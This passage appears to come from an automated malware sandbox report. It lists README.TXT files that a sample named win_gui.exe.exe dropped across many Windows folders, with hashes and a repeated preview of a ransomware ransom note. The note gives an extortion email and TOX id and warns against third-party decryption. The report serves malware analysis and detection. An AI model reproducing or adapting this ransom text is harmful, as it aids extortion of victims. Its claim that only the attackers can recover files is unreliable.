                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Microsoft Office 15\ClientX64\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Microsoft Office 15\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Uninstall Information\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:true
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Recovery\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Recovery\WindowsRE\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\Default\Desktop\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\Default\Documents\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\Default\Downloads\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\Default\Favorites\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\Default\Links\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\Default\Music\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\Default\OneDrive\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\Default\Pictures\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\Default\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\Default\Saved Games\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
